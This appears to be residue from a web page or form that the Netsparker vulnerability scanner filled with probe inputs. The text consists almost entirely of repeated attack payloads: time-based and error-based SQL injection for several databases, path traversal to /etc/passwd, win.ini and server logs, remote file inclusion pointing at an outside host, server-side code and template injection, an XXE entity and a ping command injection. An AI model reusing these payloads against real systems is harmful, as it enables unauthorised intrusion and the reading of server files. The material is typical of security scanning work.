Smith (select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL) netsparker@example.com
Smith ')) WAITFOR DELAY '0:0:25'-- netsparker@example.com
Smith 3 ping -c 25 127.0.0.1
Smith hTTp://r87.com/n netsparker@example.com
Smith 3 268409239
/../../../../../../../../../../proc/version.cgi 3 netsparker@example.com
NSFTW
1)) WAITFOR DELAY '0:0:25'--
response.write(268409241-22)'
http://r87.com/n?.cgi
/../../../../../../../../../../../etc/passwd
Smith 1)) WAITFOR DELAY '0:0:25'-- netsparker@example.com
Smith NSFTW netsparker@example.com
response.write(268409241-22)' 3 netsparker@example.com
Smith http://r87.com/n?.cgi netsparker@example.com
Smith 3 netsparker@example.com
/../../../../../../../../../../../etc/passwd 3 netsparker@example.com
1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
'+NSFTW+'
+response.write(268409241-22)'
http://r87.com/n?.cgi
ns:netsparker056650=vuln
file:///etc/passwd
Smith 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- netsparker@example.com
Smith '+NSFTW+' netsparker@example.com
+response.write(268409241-22)' 3 netsparker@example.com
Smith http://r87.com/n?.cgi netsparker@example.com
ns:netsparker056650=vuln 3 netsparker@example.com
file:///etc/passwd 3 netsparker@example.com
1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
"+response.write(268409241-22)+"
php://filter//resource=http://r87.com/n?.cgi
http://example.com/? ns: netsparker056650=vuln
/../../../../../../../../../../../etc/passwd
Smith 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- netsparker@example.com
"+response.write(268409241-22)+" 3 netsparker@example.com
Smith (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a) netsparker@example.com
Smith php://filter//resource=http://r87.com/n?.cgi netsparker@example.com
http://example.com/? ns: netsparker056650=vuln 3 netsparker@example.com
/../../../../../../../../../../../etc/passwd 3 netsparker@example.com
1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
-1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
<% response.write(268409241-22) %>
r87.com/n
ns:netsparker056650=vuln
/../../../../../../../../../../../etc/passwd.cgi
Smith 1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- netsparker@example.com
Smith -1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' netsparker@example.com
<% response.write(268409241-22) %> 3 netsparker@example.com
Smith r87.com/n netsparker@example.com
ns:netsparker056650=vuln 3 netsparker@example.com
/../../../../../../../../../../../etc/passwd.cgi 3 netsparker@example.com
syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
-1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))-- 1
print(int)0xFFF9999-22
hTTp://r87.com/n
ns:netsparker056650=vuln
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Smith -1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))-- 1 netsparker@example.com
Smith syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- netsparker@example.com
print(int)0xFFF9999-22 3 netsparker@example.com
Smith 3 hTTp://r87.com/n
ns:netsparker056650=vuln 3 netsparker@example.com
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd 3 netsparker@example.com
1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1
+print(int)0xFFF9999-22;//
-1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1
http://r87.com/n?.cgi
ns:netsparker056650=vuln
ns../../../../../../../../../../../boot.ini.......................................................................................................................................................................................
Smith 1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1 netsparker@example.com
+print(int)0xFFF9999-22;// 3 netsparker@example.com
Smith -1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1 netsparker@example.com
Smith 3 http://r87.com/n?.cgi
Smith ns:netsparker056650=vuln netsparker@example.com
ns../../../../../../../../../../../boot.ini....................................................................................................................................................................................... 3 netsparker@example.com
(length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))
'+print(int)0xFFF9999-22+'
((select sleep(25)))a-- 1
http://r87.com/n?.cgi
http://example.com/? ns: netsparker056650=vuln
/../../../../../../../../../../../etc/passwd
Smith (length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))) netsparker@example.com
'+print(int)0xFFF9999-22+' 3 netsparker@example.com
Smith ((select sleep(25)))a-- 1 netsparker@example.com
Smith 3 http://r87.com/n?.cgi
Smith http://example.com/? ns: netsparker056650=vuln netsparker@example.com
/../../../../../../../../../../../etc/passwd 3 netsparker@example.com
'||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||'
"+print(int)0xFFF9999-22+"
(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual)
php://filter//resource=http://r87.com/n?.cgi
ns:netsparker056650=vuln
/etc/passwd
Smith '||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||' netsparker@example.com
"+print(int)0xFFF9999-22+" 3 netsparker@example.com
Smith (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) netsparker@example.com
Smith 3 php://filter//resource=http://r87.com/n?.cgi
Smith ns:netsparker056650=vuln netsparker@example.com
/etc/passwd 3 netsparker@example.com
%27
1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || '
r87.com/n
ns:netsparker056650=vuln
reg.cgi
3 netsparker@example.com
Smith 3 %27
Smith 1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || ' netsparker@example.com
Smith 3 r87.com/n
Smith ns:netsparker056650=vuln netsparker@example.com
reg.cgi 3 netsparker@example.com
1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1
{php}print(int)0xFFF9999-22;{/php}
(select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
ns:netsparker056650=vuln
reg.cgi
Smith 1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1 netsparker@example.com
Smith 3 (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
{php}print(int)0xFFF9999-22;{/php} 3 netsparker@example.com
Smith 3 netsparker@example.com
Smith 3 ns:netsparker056650=vuln
reg.cgi 3 netsparker@example.com
';SELECT pg_sleep(25)--
'{${print(int)0xFFF9999-22}}'
'+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'
http://r87.com/?
http://example.com/? ns: netsparker056650=vuln
data:;base64,TlM3NzU0NTYxNDQ2NTc1
Smith ';SELECT pg_sleep(25)-- netsparker@example.com
'{${print(int)0xFFF9999-22}}' 3 netsparker@example.com
Smith 3 '+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'
http://r87.com/? 3 netsparker@example.com
Smith 3 http://example.com/? ns: netsparker056650=vuln
data:;base64,TlM3NzU0NTYxNDQ2NTc1 3 netsparker@example.com
1;SELECT pg_sleep(25)--
convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))
[php]print(int)0xFFF9999-22;[/php]
//r87.com/?
ns:netsparker056650=vuln
/Events/DiVA-July2004/reg.cgi
Smith 1;SELECT pg_sleep(25)-- netsparker@example.com
[php]print(int)0xFFF9999-22;[/php] 3 netsparker@example.com
Smith 3 convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))
//r87.com/? 3 netsparker@example.com
Smith 3 ns:netsparker056650=vuln
/Events/DiVA-July2004/reg.cgi 3 netsparker@example.com
SELECT pg_sleep(25)--
print localtime()*0+0xFFF9999-22
'+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'
http://r87.com/?
/DiVA-July2004/reg.cgi
ns:netsparker056650=vuln
Smith SELECT pg_sleep(25)-- netsparker@example.com
print localtime()*0+0xFFF9999-22 3 netsparker@example.com
Smith 3 '+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'
/DiVA-July2004/reg.cgi 3 netsparker@example.com
Smith 3 ns:netsparker056650=vuln
1);SELECT pg_sleep(25)--
eval('print localtime()*0+0xFFF9999-22')
'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='
file%3a%2fboot.ini
Smith 1);SELECT pg_sleep(25)-- netsparker@example.com
eval('print localtime()*0+0xFFF9999-22') 3 netsparker@example.com
Smith 3 'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='
file%3a%2fboot.ini 3 netsparker@example.com
Smith 3 netsparker@example.com
');SELECT pg_sleep(25)--
http://r87.com/? 3 netsparker@example.com
'+print localtime()*0+0xFFF9999-22+'
-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
c%3a%5cboot.ini
Smith ');SELECT pg_sleep(25)-- netsparker@example.com
'+print localtime()*0+0xFFF9999-22+' 3 netsparker@example.com
Smith 3 -1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
c%3a%5cboot.ini 3 netsparker@example.com
Smith 3 netsparker@example.com
'));SELECT pg_sleep(25)--
"+print localtime()*0+0xFFF9999-22+"
-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
/../../../../../../../../../../boot.ini
Smith '));SELECT pg_sleep(25)-- netsparker@example.com
"+print localtime()*0+0xFFF9999-22+" 3 netsparker@example.com
Smith 3 -1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
Smith 3 netsparker@example.com
r87.com/?
Smith /../../../../../../../../../../boot.ini netsparker@example.com
1));SELECT pg_sleep(25)--
response.write(268409241-22)'
-1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"
r87.com/? 3 netsparker@example.com
/../../../../../../../../../../web.config
Smith 1));SELECT pg_sleep(25)-- netsparker@example.com
Smith 3 -1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"
Smith 3 netsparker@example.com
Smith response.write(268409241-22)' netsparker@example.com
/\r87.com/?
Smith /../../../../../../../../../../web.config netsparker@example.com
((SELECT 1 FROM (SELECT SLEEP(25))A))
(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))
${28275*28275-(13)}
+response.write(268409241-22)'
/\r87.com/? 3 netsparker@example.com
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini
Smith ((SELECT 1 FROM (SELECT SLEEP(25))A)) netsparker@example.com
Smith 3 (SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))
${28275*28275-(13)} 3 netsparker@example.com
Smith +response.write(268409241-22)' netsparker@example.com
///r87.com/?
Smith %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini netsparker@example.com
'+((SELECT 1 FROM (SELECT SLEEP(25))A))+'
cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)
#{28275*28275-(13)}
"+response.write(268409241-22)+"
///r87.com/? 3 netsparker@example.com
/../../../../../../../../../../boot.ini.cgi
Smith '+((SELECT 1 FROM (SELECT SLEEP(25))A))+' netsparker@example.com
Smith 3 cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)
#{28275*28275-(13)} 3 netsparker@example.com
Smith "+response.write(268409241-22)+" netsparker@example.com
Smith /../../../../../../../../../../boot.ini.cgi netsparker@example.com
-1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+'
'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'
${28275*28275-(13)}
<% response.write(268409241-22) %>
3 netsparker@example.com
/../../../../../../../../../../boot.ini
Smith -1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+' netsparker@example.com
Smith 3 '||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'
Smith ${28275*28275-(13)} netsparker@example.com
Smith <% response.write(268409241-22) %> netsparker@example.com
http://r87.com/?
Smith /../../../../../../../../../../boot.ini netsparker@example.com
-1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))
(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)
#{28275*28275-(13)}
print(int)0xFFF9999-22
file:/windows/win.ini
Smith http://r87.com/? netsparker@example.com
Smith -1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A)) netsparker@example.com
Smith 3 (select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)
Smith #{28275*28275-(13)} netsparker@example.com
Smith print(int)0xFFF9999-22 netsparker@example.com
Smith file:/windows/win.ini netsparker@example.com
//r87.com/?
-1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+"
NSFTW
${28275*28275-(13)}
+print(int)0xFFF9999-22;//
file:/boot.ini
Smith //r87.com/? netsparker@example.com
Smith -1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+" netsparker@example.com
Smith 3 NSFTW
Smith 3 ${28275*28275-(13)}
Smith +print(int)0xFFF9999-22;// netsparker@example.com
Smith file:/boot.ini netsparker@example.com
http://r87.com/?
' WAITFOR DELAY '0:0:25'--
'+NSFTW+'
#{28275*28275-(13)}
'+print(int)0xFFF9999-22+'
/../../../../../../../../../../windows/win.ini
Smith 3 ' WAITFOR DELAY '0:0:25'--
Smith 3 '+NSFTW+'
Smith 3 #{28275*28275-(13)}
Smith '+print(int)0xFFF9999-22+' netsparker@example.com
Smith /../../../../../../../../../../windows/win.ini netsparker@example.com
1 WAITFOR DELAY '0:0:25'--
(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
"+print(int)0xFFF9999-22+"
Smith http://r87.com/? netsparker@example.com
/../../../../../../../../../../windows/win.ini.cgi
Smith 3 1 WAITFOR DELAY '0:0:25'--
Smith 3 (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
Smith "+print(int)0xFFF9999-22+" netsparker@example.com
3 netsparker@example.com
Smith /../../../../../../../../../../windows/win.ini.cgi netsparker@example.com
WAITFOR DELAY '0:0:25'--
-1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
c:\windows\win.ini
r87.com/?
Smith 3 WAITFOR DELAY '0:0:25'--
Smith 3 -1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
Smith netsparker@example.com
Smith netsparker@example.com
Smith c:\windows\win.ini netsparker@example.com
Smith r87.com/? netsparker@example.com
-1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))-- 1
1) WAITFOR DELAY '0:0:25'--
{php}print(int)0xFFF9999-22;{/php}
c:\boot.ini
/\r87.com/?
Smith 3 -1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))-- 1
Smith 3 1) WAITFOR DELAY '0:0:25'--
Smith 3
Smith {php}print(int)0xFFF9999-22;{/php} netsparker@example.com
Smith c:\boot.ini netsparker@example.com
Smith /\r87.com/? netsparker@example.com
1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1
') WAITFOR DELAY '0:0:25'--
'{${print(int)0xFFF9999-22}}'
]>&lfi;
/../../../../../../../../../../windows/iis6.log
///r87.com/?
Smith 3 1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1
Smith 3 ') WAITFOR DELAY '0:0:25'--
Smith '{${print(int)0xFFF9999-22}}' netsparker@example.com
]>&lfi; 3 netsparker@example.com
Smith /../../../../../../../../../../windows/iis6.log netsparker@example.com
Smith ///r87.com/? netsparker@example.com
(length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))
')) WAITFOR DELAY '0:0:25'--
[php]print(int)0xFFF9999-22;[/php]
]>&lfi;
/../../../../../../../../../../proc/self/fd/2
Smith 3 (length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))
Smith 3 ')) WAITFOR DELAY '0:0:25'--
Smith [php]print(int)0xFFF9999-22;[/php] netsparker@example.com
]>&lfi; 3 netsparker@example.com
Smith /../../../../../../../../../../proc/self/fd/2 netsparker@example.com
Smith netsparker@example.com
'||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||'
1)) WAITFOR DELAY '0:0:25'--
print localtime()*0+0xFFF9999-22
]>&lfi;
/../../../../../../../../../../proc/self/fd/2.cgi
http://r87.com/?
Smith 3 '||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||'
Smith 3 1)) WAITFOR DELAY '0:0:25'--
Smith print localtime()*0+0xFFF9999-22 netsparker@example.com
Smith ]>&lfi; netsparker@example.com
Smith /../../../../../../../../../../proc/self/fd/2.cgi netsparker@example.com
Smith 3 http://r87.com/?
1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
eval('print localtime()*0+0xFFF9999-22')
]>&lfi;
/../../../../../../../../../../etc/httpd/logs/error.log
//r87.com/?
Smith eval('print localtime()*0+0xFFF9999-22') netsparker@example.com
Smith ]>&lfi; netsparker@example.com
Smith /../../../../../../../../../../etc/httpd/logs/error.log netsparker@example.com
Smith 3 //r87.com/?
'+print localtime()*0+0xFFF9999-22+'
http://r87.com/?
/../../../../../../../../../../etc/httpd/logs/error_log
]>&lfi;
Smith '+print localtime()*0+0xFFF9999-22+' netsparker@example.com
Smith 3 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
Smith /../../../../../../../../../../etc/httpd/logs/error_log netsparker@example.com
Smith 3 ]>&lfi;
"+print localtime()*0+0xFFF9999-22+"
1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
/../../../../../../../../../../var/log/apache2/error.log
]>&lfi;
Smith "+print localtime()*0+0xFFF9999-22+" netsparker@example.com
Smith 3 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
Smith /../../../../../../../../../../var/log/apache2/error.log netsparker@example.com
Smith 3 ]>&lfi;
response.write(268409241-22)'
1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
/../../../../../../../../../../var/log/apache/error.log
Smith 3 http://r87.com/?
Smith 3 response.write(268409241-22)'
Smith 3 1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
Smith /../../../../../../../../../../var/log/apache/error.log netsparker@example.com
+response.write(268409241-22)'
syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
/../../../../../../../../../../proc/version
Smith 3 +response.write(268409241-22)'
Smith 3 syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
Smith /../../../../../../../../../../proc/version netsparker@example.com
"+response.write(268409241-22)+"
r87.com/?
-1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1
/../../../../../../../../../../proc/version.cgi
Smith 3 "+response.write(268409241-22)+"
Smith 3 r87.com/?
Smith 3 -1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1
Smith /../../../../../../../../../../proc/version.cgi netsparker@example.com
<% response.write(268409241-22) %>
/\r87.com/?
((select sleep(25)))a-- 1
/../../../../../../../../../../../etc/passwd
Smith 3 <% response.write(268409241-22) %>
Smith 3 /\r87.com/?
Smith 3 ((select sleep(25)))a-- 1
Smith /../../../../../../../../../../../etc/passwd netsparker@example.com
print(int)0xFFF9999-22
///r87.com/?
(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual)
file:///etc/passwd
Smith 3 print(int)0xFFF9999-22
Smith 3 ///r87.com/?
Smith 3 (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual)
Smith file:///etc/passwd netsparker@example.com
+print(int)0xFFF9999-22;//
1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || '
/../../../../../../../../../../../etc/passwd
Smith 3 +print(int)0xFFF9999-22;//
Smith 3
Smith 3 1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || '
Smith /../../../../../../../../../../../etc/passwd netsparker@example.com
'+print(int)0xFFF9999-22+'
1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1
